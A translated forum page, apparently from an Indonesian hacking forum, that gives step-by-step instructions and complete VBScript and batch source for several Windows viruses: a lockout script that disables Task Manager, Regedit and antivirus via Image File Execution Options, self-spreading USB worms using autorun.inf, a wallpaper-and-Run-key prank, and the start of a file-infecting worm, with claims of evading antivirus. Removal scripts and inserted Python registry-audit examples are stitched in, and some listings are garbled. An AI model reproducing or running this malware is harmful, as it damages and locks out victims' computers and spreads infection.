ercan.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: -> ERCAN-X<- ::" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD" ercan.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "THE ERCAN-X" ercan.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","No reason for Panic" ercan.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- 3rc4n.dll.vbs" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe" ercan.regwrite 
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe" if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
After you have entered the code, click FILE > SAVE. Under File Type choose ALL FILES (*.*), then save it with the name 3rc4nms32.dll.vbs. After that, try running it. And yes, you have now run ERCAN-X.VBS on your computer.
If you then open an application named cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, or PCMAV-RTP.exe, what opens instead is "Notepad", because the script set notepad.exe as the Debugger value for each of those names under Image File Execution Options.
NOW WE MAKE THE ANTIDOTE FOR THE VIRUS:
[Version]
Signature="$Chicago$"
Provider=Ercan
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, "INTERNET EXPLORER"
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger
Save it as ‘’verdhy.vbs’’ (without the quotes)
The virus below can duplicate files
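The registry changes this worm makes, and that the INF above undoes, can also be checked for directly. The following is an added example, not part of the original article: a Python audit of `reg export` text (the function names, finding labels and the sample export are assumptions constructed for this example) that reports Image File Execution Options Debugger values, the policy lockouts, and Run entries that point at script files.

```python
import re

# Key paths are compared lower-cased and without the hive name.
IFEO = r"\software\microsoft\windows nt\currentversion\image file execution options" + "\\"
POLICIES = r"\software\microsoft\windows\currentversion\policies" + "\\"
RUN = r"\software\microsoft\windows\currentversion\run"
# Policy values the scripts on this page set to 1 to lock the user out.
LOCKOUT_VALUES = {"disabletaskmgr", "disableregistrytools", "disablecmd",
                  "norun", "nofind", "nofolderoptions", "noviewcontextmenu"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd")

# "Name"=<data> line of a .reg file; names may contain escaped characters.
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def _unescape(s):
    """Undo .reg escaping (\\\\ -> \\ and \\" -> ")."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Yield (key_path, value_name, data); data is str or int (dword)."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if key is None or not m:
            continue
        name, rhs = _unescape(m.group(1)), m.group(2).strip()
        if len(rhs) >= 2 and rhs.startswith('"') and rhs.endswith('"'):
            yield key, name, _unescape(rhs[1:-1])
        elif rhs.lower().startswith("dword:"):
            yield key, name, int(rhs[6:], 16)


def audit_reg(text):
    """Return a list of (finding, subject, data) tuples in file order."""
    findings = []
    for key, name, data in parse_reg(text):
        low_name = name.lower()
        # Drop the hive so HKLM and HKCU copies of a path are treated alike.
        sub = "\\" + key.lower().partition("\\")[2]
        if sub.startswith(IFEO) and low_name == "debugger":
            # A Debugger value is also set by real debugging tools: triage signal.
            findings.append(("ifeo-debugger", key.rsplit("\\", 1)[-1], data))
        elif sub.startswith(POLICIES) and low_name in LOCKOUT_VALUES and data == 1:
            findings.append(("policy-lockout", name, data))
        elif (sub == RUN and isinstance(data, str)
              and data.strip().strip('"').lower().endswith(SCRIPT_EXTS)):
            findings.append(("run-script", name, data))
    return findings


# Constructed sample export (real exports are UTF-16; read them with
# encoding="utf-16"). Value names and data mirror those written on this page.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000001
"NoDriveTypeAutoRun"=dword:000000ff

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Systemdir"="C:\\WINDOWS\\batch- 3rc4n.dll.vbs"
"SoundMan"="SOUNDMAN.EXE"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe]
"Debugger"="notepad.exe"
'''

if __name__ == "__main__":
    for finding in audit_reg(SAMPLE_EXPORT):
        print(finding)
```

The INF removes registry values only; the dropped .vbs copies and the autorun.inf files on each drive still have to be deleted separately.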
”Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus”
on error resume next
”Dim (pendeklarasian) kata-kata berikut ini”
dim rekursif,winpath,flashdrive,fs,mf,atr,tf,sina,nt,check,sd
”Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information”
atr = “[autorun]” & vbcrlf & “shellexecute=wscript.exe sinaxxx.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekursif = rekursif & text.readline
rekursif = rekursif & vbcrlf
loop
do
”Duplicate itself as the master file in the Windows path (example: C:\Windows)”
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\SINAXXX.vbs”)
tf.attributes = 32
set tf = fs.createtextfile(winpath & “\SINAXX.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(winpath & “\SINAXXX.vbs”)
tf.attributes = 39
“Create Autorun.inf so the virus runs automatically whenever a flash disk is plugged in, and spread to every drive of type 1 and 2 (removable), including floppy disks”
for each flashdrive in fs.drives
”Command to check the drive”
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
”Create the infector if the drive type turns out to be 1 or 2, or A:\”
set tf = fs.getfile(flashdrive.path &”\SINAXXXa.vbs”)
tf.attributes = 32
set tf = fs.createtextfile(flashdrive.path &”\SINAXXX.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(flashdrive.path &”\SINAXXX.vbs”)
tf.attributes = 39
“Create the Autorun.inf whose text was prepared earlier (Auto Setup Information)”
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf = fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 39
end if
next
”Manipulate the registry”
set sina = createobject(”WScript.Shell”)
”Change the Internet Explorer CAPTION to komputer Anda terinfeksi Vrs SINAXXX”
sina.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”komputer Anda terinfeksi Vrs SINAXXX”
”Set hidden files not to be shown in Explorer”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\Advanced\Hidden”, “1″, “REG_DWORD”
”Remove the Find, Folder Options, Run and LogOff menus, and block Regedit and Task Manager”
sinaRegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoFind”, “1″, “REG_DWORD”
sina.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoRun”, “1″, “REG_DWORD”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoLogOff”, “0″, “REG_DWORD”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
”Disable right-click”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
”Show a message at every Windows startup”
sina.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption”,
“SINAXXX.”
sina.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”,
“kami dari keluarga SINA memohon maaf atas virus SINAXXX !!!!”
”Activate the virus sinaxxx.vbs at every Windows startup”
sina.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”,
windowpath & “\SINAXXX.vbs “
“Remove the Close menu”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, “0″, “REG_DWORD”
”Change RegisteredOwner and Organization”
sina.regwrite“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\RegisteredOrganization”, “The SINAXXX”sina.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”SINAXXX”
”End of the code”
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
To make the virus from the listing above, you only need to copy the listing into Notepad and then
save it under a file name with the .vbs extension, for example: sinaxxx.vbs.
PLEASE NOTE !!!!!
AFTER YOU COPY THE LISTING, DON'T FORGET TO DELETE THE COMMENTS, THE ONES ENCLOSED IN ( “ ) QUOTATION MARKS!!!!
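From the defender's side, the registry writes in the listing above (policy lockouts, a Run entry pointing at a script, Image File Execution Options Debugger values) are easy to audit in a registry export. The following is an added example, not part of the original article: it parses regedit-style export text and reports those three patterns. The sample export is constructed, and the function names are this example's own.

```python
import re

# Policy values the listings on this page set to 1 to lock the user out.
LOCKOUT_POLICIES = {"disableregistrytools", "disabletaskmgr", "disablecmd",
                    "nofolderoptions", "norun", "nofind", "noviewcontextmenu"}
SCRIPT_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf|bat|cmd)\b|\b[wc]script(\.exe)?\b", re.I)
KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def parse_reg_export(text):
    """Yield (key, value_name, data) from regedit-style export text.

    String data is unquoted and unescaped; other types (dword:, hex:) are
    passed through as written. Multi-line hex values are not reassembled.
    """
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if not (m and key):
            continue
        name, data = m.group(1) or "", m.group(2)
        if len(data) >= 2 and data[0] == data[-1] == '"':
            data = re.sub(r"\\(.)", r"\1", data[1:-1])
        yield key, name, data


def dword(data):
    """Return the integer of a 'dword:XXXXXXXX' value, or None for other types."""
    m = re.fullmatch(r"dword:([0-9a-fA-F]{1,8})", data)
    return int(m.group(1), 16) if m else None


def audit(text):
    """Return (finding, name, data) tuples for the three tamper patterns."""
    findings = []
    for key, name, data in parse_reg_export(text):
        k, n = key.lower(), name.lower()
        if "\\image file execution options\\" in k and n == "debugger":
            # Windows starts the Debugger value instead of the named program.
            findings.append(("ifeo-debugger", key.rsplit("\\", 1)[1], data))
        elif "\\currentversion\\policies\\" in k and n in LOCKOUT_POLICIES:
            if dword(data):  # 0 or a non-dword type is not a lockout
                findings.append(("policy-lockout", name, data))
        elif k.endswith("\\currentversion\\run") and SCRIPT_RE.search(data):
            findings.append(("run-script", name, data))
    return findings


# Constructed sample export; value names and data mirror the listing above.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000001
"NoLogOff"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Systemdir"="C:\\WINDOWS\\SINAXXX.vbs"
"ctfmon"="C:\\WINDOWS\\system32\\ctfmon.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe]
"Debugger"="notepad.exe"
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_EXPORT):
        print(finding)
```

A Debugger value is also set legitimately by developers, so an `ifeo-debugger` hit on its own is a prompt for review; together with policy lockouts and a script in Run it matches the behaviour of the listing.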
Making a Kspoold Antivirus with Notepad
The Kspoold virus is not really a virus that damages the system. It does not block Windows features such as Task Manager, Run, Registry Editor and so on. Instead it infects Word, Excel and similar files. So making a removal tool for it is easier too. Still, there is no harm in learning to make our own Kspoold antivirus... right? Now we will make a Kspoold removal tool armed with nothing but Notepad.
@Echo off
Cls
REM - Change the colour
Color A
REM - Change the title (use your own name if you like)
Title Kspoold Killer * By vErdHy
REM - Go to the system directory (/d also switches to the system drive)
cd /d "%SYSTEMROOT%\System32"
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo KSPOOLD KILLER
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo After you press any key on your keyboard, i do...
Echo - Removing Related Registry
Echo - Stopping Kspoold Process
Echo - Deleting Kspoold file in the system directory
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo.
Pause
Echo.
REM - Delete the registry keys created as the virus service
Reg delete "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\KspooldDaemon" /f
Reg delete "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\KspooldDaemon" /f
Reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KspooldDaemon" /f
REM - Stop the virus process
TaskKill /IM Kspoold.exe /F /T
REM - Reset the virus file's attributes to normal
Attrib -s -h -r Kspoold.exe
REM - Delete the virus file
Del Kspoold.exe
Cls
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo KSPOOLD KILLER
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo After you press any key on your keyboard, i do...
Echo - Removing Related Registry
Echo - Stopping Kspoold Process
Echo - Deleting Kspoold file in the system directory
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo.
Echo Press any key to continue...
Echo.
Echo Well done -The "Kspoold" was completely removed
Echo.
Pause
Copy and paste the script above into Notepad, and save it as
‘’Verdhy Kspoold.BAT’’ (without the quotation marks)
After saving, run it by double-clicking the file Verdhy Kspoold.BAT
=====================================================================
2. This virus must be saved under the name ‘’verdhy.exe.vbs’’ (without the quotation marks)
WARNING…!!!!
this virus is very dangerous…
whatever happens is not my responsibility…
Click Start, open Run, then open Notepad, or simply open Notepad directly
Then copy and paste the script in this table
‘El Magnifico MAN
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,”"
rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
if check 1 then
Wscript.sleep 100000
end if
loop while check1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
do while year(now) >= 2008
WScript.sleep 20000
msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _
“ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _
“dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _
“iko permainan yang paten ma dunsanak” & vbcrlf & _
vbcrlf & vbcrlf & _
” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _
” aaa kini saaiknyo ma dunsanak”
loop
Don't forget to save it by clicking FILE-SAVE and typing the name ‘’verdhy.exe.vbs’’
================================================================
3. The effect of this virus is not too dangerous …
All this virus does is change the appearance of Windows …
But it is enough to give someone a fright …!!!
But the important thing is that it is not detected by antivirus (as far as I know)
This only works on WINDOWS XP
How to:
- open Notepad and write (copy and paste … but edit it first … ) the script in this table
@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f
- then SAVE AS ALL FILES with the .bat extension (verdhy.bat)
- create Autorun.inf with this script:
[autorun]
open=verdhy.bat
- then SAVE AS ALL FILES with the .inf extension (Autorun.inf)
- these files must be in one directory; then select the files, right-click PROPERTIES and tick HIDDEN and READ-ONLY
- copy the files to a CD
- enjoy the effect
Notes:
1. This is for learning purposes only
2. We are not responsible for misuse of the article above
3. Have fun
note:
- do not misuse it …
- sorry if this has been posted before
- sorry again if this is the wrong place to post,….I'm a new member and still an amateur …
- sorry once more if anything is wrong, and please correct me …
- if you want to make the antivirus for it, just modify the values …
Source: http://www.yogyafree.net/forum2/viewtopic.php?t=11281
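Every listing on this page relies on the same hook: an autorun.inf whose launch entry starts a script host or a script file. The following added example (not part of the original article) parses an autorun.inf and flags exactly that, so removable media can be triaged before use. The sample file bodies are constructed from the autorun.inf text shown on this page, and the function names are this example's own.

```python
import ntpath
import os
import re

# Interpreters that a legitimate installer disc has no reason to start.
SCRIPT_HOSTS = {"wscript", "wscript.exe", "cscript", "cscript.exe", "cmd", "cmd.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd")
SHELL_VERB = re.compile(r"shell\\[^\\]+\\command")


def parse_autorun(text):
    """Return the key/value pairs of the [autorun] section, keys lower-cased."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
        elif in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def assess(text):
    """List (key, command, reasons) for launch entries that start a script."""
    findings = []
    for key, command in parse_autorun(text).items():
        if key not in ("open", "shellexecute") and not SHELL_VERB.fullmatch(key):
            continue  # icon=, label=, action= and so on do not launch anything
        tokens = command.replace('"', " ").split()
        reasons = []
        if tokens and ntpath.basename(tokens[0]).lower() in SCRIPT_HOSTS:
            reasons.append("script-host")
        if any(t.lower().endswith(SCRIPT_EXTS) for t in tokens):
            reasons.append("script-file")
        if reasons:
            findings.append((key, command, reasons))
    return findings


def scan_root(root):
    """Assess the autorun.inf in a drive root, if any (name matched case-insensitively)."""
    for entry in os.scandir(root):
        if entry.is_file() and entry.name.lower() == "autorun.inf":
            with open(entry.path, encoding="latin-1") as fh:
                return assess(fh.read())
    return []


# Constructed samples: the first two repeat autorun.inf bodies shown on this page.
WORM_INF = "[autorun]\r\nshellexecute=wscript.exe sinaxxx.vbs"
BATCH_INF = "[autorun]\nopen=verdhy.bat\n"
INSTALLER_INF = "[autorun]\nopen=setup.exe\nicon=setup.exe,0\nlabel=Installer\n"

if __name__ == "__main__":
    for name, text in (("worm", WORM_INF), ("batch", BATCH_INF), ("installer", INSTALLER_INF)):
        print(name, assess(text))
```

On the host side, setting the `NoDriveTypeAutoRun` policy value to 0xFF under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer` turns AutoRun off for all drive types, which removes the hook regardless of what the file contains.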
4. A virus is something most people certainly dislike, so when your computer catches a virus, ugh, it is really annoying, isn't it ???
So there is no harm in making a small virus, because small things can become big. It also broadens our knowledge of the ins and outs of “the Destroyer”, alias viruses …
because learning is fun, especially when it is just for kicks. [hheeheee]
OK, let's get straight to it .,….
1. Open Notepad [any way you like works, for example Run >> type Notepad >> and that's it, right???
Copy the script below . . .
Rem sidoarjocity4154802560
On Error Resume Next
Dim Reg, fso, Induk
Set Reg = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
Set Induk = fso.GetFile(Wscript.ScriptFullName)
If Induk <> Reg.SpecialFolders("AppData") & "\blukutuk.vbs" then
If fso.fileExists(Left(Induk, Len(Induk) - 4)) Then
Reg.Run (Reg.RegRead("HKCR\" & BacaHandle("doc") & "\shell\Open\command\") & " " & chr(34) & Left(Induk, len(Induk)-3) & chr(34))
Else
Reg.Run (Reg.RegRead("HKCR\" & BacaHandle("doc") & "\shell\Open\command\") & " " & chr(34) & chr(34))
End If
End If
AutoFlash
Sebar1
Sebar2
Samar
Pertahanan
ShortCut
SerangFile (Left(Induk, InStrRev(Induk, " \ ")))
SerangFolder (Left(Induk, InStrRev(Induk, " \ ")))
SerangDrive("c:\")
SerangDrive("d:\")
SerangDrive("e:\")
SerangDrive("f:\")
SerangDrive("g:\")
AlwaysRun
SerangRecent
Sub AutoFlash
On Error Resume Next
Dim flashdrive, auto, tf1, tf2
For Each flashdrive In fso.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
Set auto = fso.CreateTextFile(flashdrive.Path & ("\AutoRun.inf"), True)
auto.Write ("[autorun]"& vbcrlf & "shellexecute=wscript.exe sidoarjo hot.vbs")
auto.Close
set tf1=fso.getfile(flashdrive.path & "\AutoRun.inf")
tf1.Attributes = 32
